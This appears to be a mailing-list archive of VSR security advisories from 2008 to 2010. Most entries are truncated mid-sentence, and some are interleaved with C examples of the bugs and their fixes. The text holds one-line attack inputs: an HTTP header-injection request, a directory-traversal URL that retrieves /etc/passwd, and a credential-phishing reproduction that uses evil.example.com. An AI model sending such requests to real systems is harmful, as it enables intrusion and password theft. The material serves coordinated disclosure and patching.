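/* Byte-string search that does not stop at NUL (the reply ends with one). */
static bool contains_bytes(const char *hay, size_t n, const char *needle, size_t m)
{
    for (size_t i = 0; m <= n && i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0)
            return true;
    return false;
}

/* Driver: ask for 60 bytes into a 64-byte user buffer and report whether the
 * neighbouring allocation's contents came back. */
static bool sample_leaks_secret(bool fixed)
{
    struct vice_ioctl vi = { .in = NULL, .out = NULL, .in_size = 0, .out_size = 60 };
    char user[64] = {0};
    long n = fixed ? copyout_fixed(&vi, user, sizeof user)
                   : copyout_vulnerable(&vi, user, sizeof user);
    if (n < 0)
        return false;
    return contains_bytes(user, (size_t)n, "SECRET", 6);
}

static bool sample_fixed_rejects_huge(void)
{
    struct vice_ioctl vi = { .in = NULL, .out = NULL, .in_size = 0, .out_size = 9000 };
    char user[64];
    return copyout_fixed(&vi, user, sizeof user) < 0;
}

int main(void)
{
    printf("unchecked out_size leaks neighbour: %d\n", sample_leaks_secret(false));  /* 1 */
    printf("clamped out_size leaks neighbour:   %d\n", sample_leaks_secret(true));   /* 0 */
    return 0;
}
```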


Versions Affected
-----------------
This vulnerability affects all known versions of the Coda filesystem module as
included in FreeBSD and NetBSD.  The Linux Coda module is not affected.


Vendor Response
---------------
The following timeline details FreeBSD's and NetBSD's response to the reported
issue:

2010-07-19  Vulnerability reported to FreeBSD and NetBSD
2010-07-20  Fix committed by NetBSD [2]
2010-07-21  Response from FreeBSD
2010-07-21  FreeBSD and NetBSD provided a draft advisory
2010-08-05  Fix committed by FreeBSD [3]
2010-08-16  Coordinated disclosure


Recommendation
--------------

Coda users should apply the updates committed by NetBSD [2] and FreeBSD [3].


Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-3014 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
----------------
Thanks to the FreeBSD and NetBSD security teams for their prompt responses.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Coda File System
 http://www.coda.cs.cmu.edu

2. Coda module in NetBSD CVS
 http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/coda/?only_with_tag=MAIN

3. FreeBSD SVN revision 210997
 http://svn.freebsd.org/viewvc/base?view=revision&revision=210997

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is 

CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs

2010-07-15 Thread VSR Advisories


 VSR Security Advisory
   http://www.vsecurity.com/


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs
 Release Date: 2010-07-13
  Application: WebLogic Plugin
 Versions: All known versions
 Severity: High
Discovered by: Timothy D. Morgan  tmorgan (at) vsecurity {dot} com 
 Contributors: George D. Gal  ggal {at} vsecurity (dot) com 
Vendor Status: Patch Released [4]
CVE Candidate: CVE-2010-2375
Reference: http://www.vsecurity.com/resources/advisory/20100713-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
The product is best described by Oracle marketing literature in:

 Oracle WebLogic Server Enterprise Edition offers enterprises the ability to
  consolidate their applications on a pool of shared servers for both high 
  efficiency and superior performance. No other application server has
  the proven performance on industry benchmarks across the most varied
  chip types and operating systems.  Sophisticated High Availability
  (HA) features built on clustered instances ensure uptime. Easy-to-use
  yet substantial management tools keep systems going without hassle or
  expense. By coalescing applications and services onto Oracle WebLogic
  Server, IT is in position to react swiftly to change and help the
  enterprise outperform the competition. -- [1]

And:
 Oracle WebLogic Server Web Server Plugins provide load balancing
  across WebLogic Server Clusters by acting as front-end proxies. While
  WebLogic Server Web Server Plugins 1.0 are bundled with WebLogic
  Server, these new WebLogic Server Web Server Plugins 1.1 are
  downloadable separately outside of WebLogic Server and deliver
  enhanced functionality and improved security. -- [2]


Vulnerability Overview
----------------------
Over the last several years, VSR analysts had observed unusual behavior
in multiple WebLogic deployments when certain special characters were
URL encoded and appended to URLs.  In late April, 2010 VSR began
researching this more in depth and found that the issue could allow for
HTTP header injection and HTTP request smuggling attacks.


Product Background
------------------
WebLogic application server is commonly deployed in a three-tier
architecture where the application server resides behind a public-facing
web server. Oracle provides proprietary web server plugin modules for
multiple web server software packages on various platforms in order to
allow these services to act as reverse proxies and in some cases, load
balancers for multiple middle-tier WebLogic application servers.


Vulnerability Overview
----------------------
The vulnerability stems from the web server plugin's processing of URLs
submitted by users.  When a URL is received, it is URL decoded at some
point, but is not re-encoded prior to inclusion in requests to the
middle-tier WebLogic server.  This allows for special characters, such
as new lines, to be injected into requests directed at application
servers.

For instance, if an attacker were to send the following simple request: 

 GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
 Host: vulnerable.example.com
 Connection: close

The web server proxy module would instead send a request on to the 
application server which looks more like:

 GET /logo.gif HTTP/1.1
 X-hdr: x HTTP/1.1
 Host: vulnerable.example.com
 Connection: close

This behavior allows for a wide variety of attacks, including trusted
header injection and HTTP request smuggling.
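The plugin's decode step and the re-encoding it should have done before forwarding, as an added C example that is not Oracle's plugin code: decoding the request above yields a target containing space, CR and LF, and re-encoding on the way out keeps them inside a single request line. The set of bytes kept verbatim follows the RFC 3986 pchar set and is an assumption for the example.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode a request target, as the plugin does at some point.
 * Returns the decoded length, or (size_t)-1 if out is too small. */
static size_t url_decode(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (const char *p = in; *p; p++) {
        int hi, lo;
        if (o + 1 >= cap)
            return (size_t)-1;
        if (*p == '%' && (hi = hexval(p[1])) >= 0 && (lo = hexval(p[2])) >= 0) {
            out[o++] = (char)(hi * 16 + lo);
            p += 2;
        } else {
            out[o++] = *p;
        }
    }
    out[o] = '\0';
    return o;
}

/* Bytes that may appear verbatim in a path (RFC 3986 pchar plus '/'); everything
 * else, CR, LF and space included, is percent-encoded before forwarding. */
static bool path_safe(unsigned char c)
{
    return isalnum(c) || strchr("-._~!$&'()*+,;=:@/", c) != NULL;
}

/* Re-encode before forwarding so that nothing the decoder produced can end the
 * request line or start a new header on the way to the application server. */
static size_t url_encode_path(const char *in, char *out, size_t cap)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t o = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        if (path_safe(*p)) {
            if (o + 1 >= cap) return (size_t)-1;
            out[o++] = (char)*p;
        } else {
            if (o + 3 >= cap) return (size_t)-1;
            out[o++] = '%';
            out[o++] = hex[*p >> 4];
            out[o++] = hex[*p & 15];
        }
    }
    out[o] = '\0';
    return o;
}

/* Alternative to re-encoding: refuse any decoded target that could break the request line. */
static bool decoded_target_is_injection(const char *decoded)
{
    return strpbrk(decoded, " \r\n") != NULL;
}

/* The request target quoted in the advisory, run through both steps. */
static const char *sample_decoded(void)
{
    static char buf[256];
    url_decode("/logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x", buf, sizeof buf);
    return buf;
}

static const char *sample_forwarded(void)
{
    static char dec[256], enc[512];
    url_decode("/logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x", dec, sizeof dec);
    url_encode_path(dec, enc, sizeof enc);
    return enc;
}

int main(void)
{
    printf("decoded target contains line breakers: %d\n", decoded_target_is_injection(sample_decoded()));
    printf("forwarded as: GET %s HTTP/1.1\n", sample_forwarded());
    return 0;
}
```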


Attack Scenarios
----------------
In the simplest scenarios, an attacker could use this flaw to inject
malicious versions of headers which are considered trusted.  In certain
situations, headers are added to requests by the web server proxy module
which may be used to make decisions about authentication or access
control.  

For instance, the WL-Proxy-Client-IP header is added to requests to
indicate to the application server which IP address the client used.  If
the application server uses this to enforce IP-based access control
restrictions, then clearly this injection vulnerability could be used to
bypass this restriction.

Another example would be the injection of a WL-Proxy-Client-Cert
header.  This header is used in deployments where clients are provided
SSL/TLS client certificates for authentication.  Since web servers would
typically terminate this encrypted communication, application servers
need a way of identifying the user who was authenticated.  The
WL-Proxy-Client-Cert header is used to communicate this information between
the web server plugin and application servers.  By injecting a false
version of this header, it would be possible to impersonate other users
and perhaps avoid presenting a client certificate at all.

More complex attacks are also possible by 

VSR Advisory: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities

2010-07-02 Thread VSR Advisories

   Virtual Security Research, LLC.
  http://www.vsecurity.com/
 Security Advisory


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header
   Manipulation Vulnerabilities
 Release Date: 2010-07-02
  Application: Cisco Content Services Switch (CSS) / ACE Products
 Versions: Cisco CSS 11500 - 08.20.1.01
Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5)]
(Other versions may be affected)
 Severity: High (in specific configurations)
   Author: George D. Gal ggal (a) vsecurity . com
Vendor Status: Cisco CSS vulnerability remains unpatched, workarounds
available
   Cisco ACE workarounds available
CVE Candidate: CVE-2010-1575 - Certificate Spoofing Flaw
   CVE-2010-1576 - HTTP Request Parsing Flaw
Reference: http://www.vsecurity.com/resources/advisory/20100702-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:
 The Cisco CSS 11500 Series Content Services Switch is a high-performance,
  high-availability modular architecture for Web infrastructures. As the
  premiere switch for the Cisco Web Network Services Software, the Cisco
  CSS 11500 Series helps businesses to build global Web networks
  optimized for content delivery and e-commerce. By activating HTTP
  headers, the CSS 11500 Series helps to ensure availability, optimize
  utilization, reduce latency, increase scalability, and enhance security
  for Websites, server farms, cache clusters, and firewall systems.

From [2]:
  Cisco(R) ACE Application Control Engine application switches represent
  the state of the art in next-generation application switches for
  increasing the availability, performance, and security of data center
  applications.
  The Cisco ACE family of application switches includes the Cisco ACE
  Service Module for the Cisco Catalyst(R) 6500 Series Switches and Cisco
  7600 Series Routers, as well as the Cisco ACE 4710 Appliance in a
  standalone form factor for discrete data center deployments.


Vulnerability Overview
----------------------
On June 4th 2009, VSR identified multiple weaknesses in the Cisco CSS
11500's handling of HTTP header interpretation and client-side SSL
certificates.  Individually, these issues may be considered minor, but
combined they could allow for the compromise of an application that
relies on a vulnerable CSS to assist in authenticating clients.  If
successfully exploited, an attacker could spoof another application
user's identity without possession of the victim's client certificate.

Additionally, due to the fact that the Cisco CSS product has been
effectively superseded by the Cisco ACE, VSR has also identified
similar issues to those described below in the ACE in particular
configurations.

These issues may affect any CSS installation, but would have the
greatest impact on deployments that have the following feature enabled
in the configuration:

 ssl-server context http-header client-cert

Similarly, on the Cisco ACE, these issues may manifest themselves when
using a policy map with a class-default class, as shown below:

 policy-map type loadbalance first-match SLB-VIP-REDIRECT
   class class-default
 serverfarm TEST-FARM
 action DO-SOMETHING-WITH-HEADERS
 insert-http X-SRC-IP header-value %is


Issue 1: Weak Enforcement of Authority in HTTP Certificate Headers
------------------------------------------------------------------
Cisco Bug Id - CSCSZ04690
Affects  - Cisco CSS

The first weakness affecting the Cisco CSS is that, in a typical client
certificate configuration, HTTP clients may confuse web applications by
injecting their own certificate headers.  When utilizing the CSS to
terminate SSL communications, SSL client certificates are first
authenticated by the CSS.  From there, the CSS will normally pass the
client's identity to the back-end web server in the form of several HTTP
headers as shown below:

ClientCert-Subject: XXX
ClientCert-Subject-CN: XXX
ClientCert-Fingerprint: XXX
ClientCert-Subject-CN: XXX
ClientCert-Issuer-CN: XXX
ClientCert-Certificate-Version: XXX
ClientCert-Serial-Number: XXX
ClientCert-Data-Signature-Algorithm: XXX
ClientCert-Subject: XXX
ClientCert-Issuer: XXX
ClientCert-Not-Before: XXX
ClientCert-Not-After: XXX
ClientCert-Public-Key-Algorithm: XXX
ClientCert-RSA-Modulus-Size: XXX
ClientCert-RSA-Modulus: XXX
ClientCert-RSA-Exponent: XXX
ClientCert-X509v3-Subject-Key-Identifier: XXX
ClientCert-X509v3-Authority-Key-Identifier: XXX
ClientCert-Signature-Algorithm: XXX
ClientCert-Signature: XXX


However, there is no attempt by the CSS to prevent clients from
supplying their own ClientCert-* headers.  Depending on how application
developers handle multiple copies of these headers, an attacker may be
able to impersonate other users.
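Two defensive checks for the weakness just described, as an added C example that is neither Cisco's nor any application's code: on the proxy side, drop every ClientCert-* header the client sent before the switch appends its own; on the application side, treat more than one copy of a ClientCert-* header as an attack rather than picking one. The request, the header the switch adds and the buffer sizes are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define CLIENT_CERT_PREFIX "ClientCert-"

/* Proxy-side: copy the request to out, omitting header lines whose name starts
 * with ClientCert- (case-insensitive).  Filtering stops at the blank line so the
 * body is never touched.  Returns the number of lines dropped, or (size_t)-1 if
 * out is too small. */
static size_t strip_client_cert_headers(const char *in, char *out, size_t cap)
{
    const size_t plen = strlen(CLIENT_CERT_PREFIX);
    size_t removed = 0, o = 0;
    bool in_headers = true;
    const char *p = in;

    while (*p) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) + 2 : strlen(p);
        bool drop = false;
        if (in_headers) {
            if (len == 2)                              /* empty line ends the header block */
                in_headers = false;
            else if (len >= plen && strncasecmp(p, CLIENT_CERT_PREFIX, plen) == 0)
                drop = true;
        }
        if (drop) {
            removed++;
        } else {
            if (o + len >= cap) return (size_t)-1;
            memcpy(out + o, p, len);
            o += len;
        }
        p += len;
    }
    out[o] = '\0';
    return removed;
}

/* Application-side: count occurrences of a header name in the header block.
 * More than one copy of a ClientCert-* header means the value cannot be trusted. */
static size_t count_header(const char *in, const char *name)
{
    size_t nlen = strlen(name), count = 0;
    for (const char *p = in; *p; ) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) + 2 : strlen(p);
        if (len == 2) break;                           /* end of headers */
        if (len > nlen && strncasecmp(p, name, nlen) == 0 && p[nlen] == ':')
            count++;
        p += len;
    }
    return count;
}

/* Constructed request: the client supplies its own ClientCert-Subject-CN. */
static const char client_request[] =
    "GET /account HTTP/1.1\r\n"
    "Host: app.example.com\r\n"
    "ClientCert-Subject-CN: admin\r\n"
    "\r\n";

/* What the switch derives from the certificate it actually authenticated. */
static const char css_added[] = "ClientCert-Subject-CN: alice\r\n";

/* Model of the switch: optionally strip, then insert its own header before the blank line. */
static const char *forward_to_app(bool strip)
{
    static char buf[512];
    char tmp[512];
    if (strip) {
        if (strip_client_cert_headers(client_request, tmp, sizeof tmp) == (size_t)-1)
            return NULL;
    } else {
        snprintf(tmp, sizeof tmp, "%s", client_request);
    }
    const char *end = strstr(tmp, "\r\n\r\n");
    if (!end)
        return NULL;
    size_t head = (size_t)(end - tmp) + 2;
    snprintf(buf, sizeof buf, "%.*s%s%s", (int)head, tmp, css_added, end + 2);
    return buf;
}

/* How many ClientCert-Subject-CN values the application sees with and without the strip. */
static size_t sample_cn_copies(bool strip)
{
    const char *req = forward_to_app(strip);
    return req ? count_header(req, "ClientCert-Subject-CN") : (size_t)-1;
}

int main(void)
{
    printf("copies seen without strip: %zu, with strip: %zu\n", sample_cn_copies(false), sample_cn_copies(true));
    return 0;
}
```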

For 

CVE-2009-4510: TANDBERG VCS Static SSH Host Keys

2010-04-12 Thread VSR Advisories



   Virtual Security Research, LLC.
  http://www.vsecurity.com/
 Security Advisory


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys
 Release Date: 2010-04-09
  Application: Video Communication Server (VCS)
 Versions: x4.3.0, x4.2.1, and possibly earlier
 Severity: High
Discovered by: Jon Hart
  Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com
Vendor Status: Firmware version x5.1.1 released [2].
CVE Candidate: CVE-2009-4510
Reference: http://www.vsecurity.com/resources/advisory/20100409-2/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:

 The Video Communication Server (VCS) is an integral part of the TANDBERG 
  Total Solution and is the center of the video communications network, 
  connecting the benefits of video conferencing and telepresence to other 
  communications environments including unified communications and IP Telephony
  networks.


Vulnerability Overview
----------------------
On December 2nd, VSR identified an SSH service authentication weakness in
TANDBERG's Video Communication Server.  This issue would
allow an attacker with privileged network access to conduct server impersonation
and man-in-the-middle attacks on administrator SSH sessions.  Successful attacks
could yield shell access to vulnerable appliances.


Product Background
------------------
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices.  The VCS provides several system shell accounts accessible via the SSH
protocol.


Vulnerability Details
---------------------
The TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored
in files:
 /tandberg/sshkeys/ssh_host_dsa_key
 /tandberg/sshkeys/ssh_host_dsa_key.pub

In tested versions of the firmware, this default key has a fingerprint of: 
  49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8

No new key is generated upon installation.  In addition, this default key would
overwrite any SSH server keys, if installed by security-conscious administrators
previously, during a firmware upgrade.

Due to the public nature of this key (see firmware downloads [2]) an attacker
would be able to conduct server impersonation and man-in-the-middle attacks on
SSH connections directed at any TANDBERG VCS device.  A successful exploit would
most likely yield an attacker shell access to the device with privileges of the
victim client.


Versions Affected
-----------------
VSR has observed this vulnerability in version x4.2.1.  Based on preliminary
analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also
appear to be vulnerable.  Earlier versions have not been tested.


Vendor Response
---------------
The following timeline details TANDBERG's response to the reported issue:

2009-12-09  Preliminary notice to TANDBERG. TANDBERG responded immediately.

2009-12-22  VSR provided TANDBERG a draft advisory.

2009-12-28  TANDBERG provided VSR with a beta version of the x5.0 firmware,
            but this did not appear to correct the issue.

2010-01-22  TANDBERG provided VSR with a beta version of the x5.1 firmware,
            but this did not appear to correct the issue for existing
            installations, since old vulnerable keys would be preserved.

2010-01-28  TANDBERG explained that changing SSH keys automatically on
            administrators may cause backward compatibility problems.
            Therefore, TANDBERG decided to preserve old keys even when
            upgrading a system which contains a vulnerable key.
            Administrators will instead be warned in the web console that a
            vulnerable key is in use and will be expected to update host keys
            manually.

2010-03-26  TANDBERG provided VSR with a release candidate firmware for
            version x5.1.1.

2010-04-07  TANDBERG VCS firmware version x5.1.1 released [2].

2010-04-09  VSR advisory released.



Recommendation
--------------
Immediately replace the current SSH host key with a new one.  This may
be accomplished through one of several methods.  One approach is to
simply log in to the device locally and use the ssh-keygen utility to
replace the keys stored in /tandberg/sshkeys/.  Consult TANDBERG
documentation for other methods.

After replacing the SSH host keys, it is recommended that the VCS
firmware be upgraded to X5.1.1 as soon as possible.  NOTE: Upgrading or
downgrading to versions prior to X5.1.1 will cause any custom SSH host
keys to be overwritten. Version X5.1.1 and later should preserve any
custom host keys previously installed.  As a precaution, after 

CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval

2010-04-12 Thread VSR Advisories



   Virtual Security Research, LLC.
  http://www.vsecurity.com/
 Security Advisory


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval
 Release Date: 2010-04-09
  Application: Video Communication Server (VCS)
 Versions: x4.3.0, x4.2.1, and possibly earlier
 Severity: Medium
Discovered by: Jon Hart
  Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com
Vendor Status: Firmware update released [2]
CVE Candidate: CVE-2009-4511
Reference: http://www.vsecurity.com/resources/advisory/20100409-3/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
From [1]:

  "The Video Communication Server (VCS) is an integral part of the TANDBERG
   Total Solution and is the center of the video communications network,
   connecting the benefits of video conferencing and telepresence to other
   communications environments including unified communications and IP
   Telephony networks."


Vulnerability Overview
--
On December 3rd, VSR identified a directory traversal and file retrieval
vulnerability in TANDBERG's Video Communication Server.  This issue would
allow an authenticated attacker (who has access as an administrator or less
privileged user on the web administration interface) to retrieve files from the
filesystem which are readable by the nobody system user.


Product Background
--
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices.  The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates,
along with a number of other items.


Vulnerability Details
-
The TANDBERG VCS web management interface provides two nearly identical scripts
at URLs:
  https://vulnerable.example.com/helppage.php
  https://vulnerable.example.com/user/helppage.php

These help pages accept a file parameter in the URL which can be used to
retrieve nearly arbitrary files from the filesystem.  The relevant source code
for these pages is as follows:

// The following is Copyright (C) 2009 TANDBERG //
...
// Grab the content before we write anything: we'll need it for the title tag in the head
// Dig out the page title, from the title tag,
// then remove any surround in the page as we add our own...
$filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix;

if (! file_exists($filename)) {
  $helpHTML = "There is no help available for the " . $_GET['page'] . " page<br/>";
  $pageTitle = $_GET['page'];
}else{
  $helpHTML = file_get_contents($filename);

...

  echo "\n<!-- ** -->\n";
  echo $helpHTML;
  echo "<!-- ** -->\n";
...
// end of excerpt //


Here, the final path string ($filename) loaded and displayed to the user is
prepended with a directory and appended with a file extension.  Using simple
directory traversal techniques (../) it is possible to traverse to any
directory on the filesystem.  Using a trailing NUL byte encoded in the URL (%00)
it is also possible to truncate the file path to eliminate the file extension.

For instance, the following URL retrieves the /etc/passwd file:

  https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00


During testing, it was found that the x4.2.1 firmware runs the web server as the
nobody user, which somewhat limits the amount of sensitive information that
may be obtained.  However, since shadowed passwords were not configured, it was
possible to retrieve all local system users' password hashes from /etc/passwd. 
Additional password hashes are available in /tandberg/persistent/etc/digest.
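As an added illustration (not TANDBERG code), the following C program shows why a trailing %00 defeats a file API that takes C strings, and how a whitelist check on the page parameter rejects both the traversal sequence and the NUL byte.  HELP_DIR and HELP_SUFFIX are assumed stand-ins for the PHP helpPagePath and helpPageSuffix values; all function names are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HELP_DIR    "/var/www/help/"   /* assumed stand-in for helpPagePath   */
#define HELP_SUFFIX ".html"            /* assumed stand-in for helpPageSuffix */

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decodes 'in' into 'out' (capacity outsz). Returns the number of
 * decoded bytes, or -1 on malformed escapes or overflow. Decoded NUL bytes
 * are kept in place so the caller can detect them. */
int url_decode(const char *in, unsigned char *out, size_t outsz) {
    size_t n = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (n + 1 >= outsz) return -1;
        if (in[i] == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[i + 2]);
            if (lo < 0) return -1;
            out[n++] = (unsigned char)(hi * 16 + lo);
            i += 2;
        } else {
            out[n++] = (unsigned char)in[i];
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* Length a C-string consumer (fopen, stat, ...) sees: it stops at the first
 * NUL, so everything the script appended after the decoded %00, including
 * the ".html" suffix, is silently dropped. */
size_t c_visible_length(const unsigned char *decoded, size_t decoded_len) {
    size_t i = 0;
    while (i < decoded_len && decoded[i] != '\0') i++;
    return i;
}

/* Whitelist validation: a help page name may contain only [A-Za-z0-9_-],
 * which excludes '/', '.', and therefore any "../" sequence. Returns 1 and
 * writes the final path into 'path' if 'raw' (the URL-encoded page
 * parameter) is acceptable; returns 0 otherwise. */
int resolve_help_page(const char *raw, char *path, size_t pathsz) {
    unsigned char dec[256];
    int n = url_decode(raw, dec, sizeof dec);
    if (n <= 0) return 0;
    /* An embedded NUL means the C-visible length is shorter than the
     * decoded length: reject instead of letting the suffix be truncated. */
    if (c_visible_length(dec, (size_t)n) != (size_t)n) return 0;
    for (int i = 0; i < n; i++) {
        unsigned char c = dec[i];
        if (!(isalnum(c) || c == '_' || c == '-')) return 0;
    }
    int w = snprintf(path, pathsz, "%s%s%s", HELP_DIR, (const char *)dec, HELP_SUFFIX);
    return w > 0 && (size_t)w < pathsz;
}
```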


Versions Affected
-
VSR has successfully exploited this issue in firmware version x4.2.1.  Based on
preliminary source code analysis [2], versions x4.3.0 and x5.0 also appear to be
vulnerable.  Earlier versions have not been tested.


Vendor Response
---
The following timeline details TANDBERG's response to the reported issue:

2009-12-09  Preliminary notice to TANDBERG. TANDBERG responded immediately.

2009-12-22  VSR provided TANDBERG a draft advisory.

2009-12-28  TANDBERG provided VSR with a beta version of the x5.0 firmware,
            but this did not appear to correct the issue (based on PHP code
            analysis alone).

2010-01-22  TANDBERG provided VSR with a beta version of the x5.1 firmware
            for testing which appeared to correct the vulnerability.

2010-03-26  TANDBERG provided VSR with a release candidate firmware for
            version x5.1.1.

2010-04-07  TANDBERG

Chrome Password Manager Cross Origin Weakness (CVE-2010-0556)

2010-02-16 Thread VSR Advisories

   Virtual Security Research, LLC.
  http://www.vsecurity.com/
  Security Advisory


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Chrome Password Manager Cross Origin Weakness
 Release Date: 2010-02-15
  Application: Google Chrome Web Browser
 Versions: 4.0.249.78, 3.0.195.38, and likely earlier
 Severity: Medium/Low
   Author: Timothy D. Morgan tmorgan (a) vsecurity . com
Vendor Status: Update Released [2]
CVE Candidate: CVE-2010-0556
Reference: http://www.vsecurity.com/resources/advisory/20100215-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
"Google Chrome is a web browser that runs web pages and applications with
 lightning speed." [1]


Vulnerability Overview
--
In mid-January, VSR identified a vulnerability in Google Chrome which could be
used in phishing attacks in specific types of web sites.  This issue may make it
much easier to convince a victim to submit web application credentials to the
attacker's site.


Vulnerability Details
-
As with many modern browsers, Google Chrome implements a password manager to
help users keep track of credentials used on various web sites.  It may be used
to store either HTTP authentication credentials or form-based credentials.

The vulnerability surfaces in a situation where a user visits a web page which
includes an embedded object, such as an image, from a third-party site.  If an
attacker had control of the third-party web server, he could request credentials
from the user via HTTP authentication.  This style of attack has been documented
in the past, and some variations on this theme are explored in a recent paper
by VSR [5].

However, in the case of vulnerable versions of Google Chrome, the password
manager may pre-fill the authentication dialog box with credentials intended for
the parent page's domain, leaving users one click away from account compromise.
This issue would affect Chrome users who use applications that allow users to
embed objects from third parties.  Examples of such applications may include
message boards, blogs, or social networking sites.

The following steps may be used to reproduce the issue:

1. Set up an HTML page with the following contents:
   <html><body>
     <img src="http://evil.example.com/image.png" />
   </body></html>

   This page should not be protected by any authentication and should be hosted
   at: 
 http://victim.example.org/test-img.html


2. Set up an HTTP digest protected area under the following URL:
   http://victim.example.org/private/


3. Set up the attacker's server to be protected by HTTP authentication such that
   the following URL is protected: 
   http://evil.example.com/image.png


4. Use Google Chrome to log in to an area protected with HTTP authentication,
   such as:
   http://victim.example.org/private

   Save the password in the password manager.


5. Finally, access the unauthenticated HTML page on the victim's server:
   http://victim.example.org/test-img.html
 
   Since the embedded image requires authentication, a password prompt should
   appear.  In vulnerable versions of Google Chrome, this form will be
   pre-filled with the stored credentials from the victim.example.org domain,
   even though the password prompt is generated by evil.example.com.



Versions Affected
-
The issue was originally discovered in version 3.0.195.38 and was also verified
to exist in version 4.0.249.78.  Testing was conducted on the Windows platform.


Vendor Response
---
The following timeline details Google's response to the reported issue:

2010-01-20  VSR submitted a security bug report [3].  Chromium development
            team began researching the issue.

2010-01-21  VSR provided additional details on the test scenario.  Chromium
            developers successfully reproduced the issue and committed a fix
            to the source repository [4].

2010-02-10  Chrome stable version 4.0.249.89 released which includes the fix.

2010-02-15  VSR advisory released.



Recommendation
--
Upgrade to the latest version of Google Chrome as soon as possible.

Users are advised to be wary of HTTP authentication prompts and to carefully
inspect the domains presented in these messages to see if they match the domain
of the expected site.



Common Vulnerabilities and Exposures (CVE) Information
--
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-0556 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements

Thanks to the Chromium development team for the prompt response.



CVE-2008-2086: Java Web Start File Inclusion via System Properties Override

2008-12-04 Thread VSR Advisories



   Virtual Security Research, LLC.
  http://www.vsecurity.com/
 Security Advisory


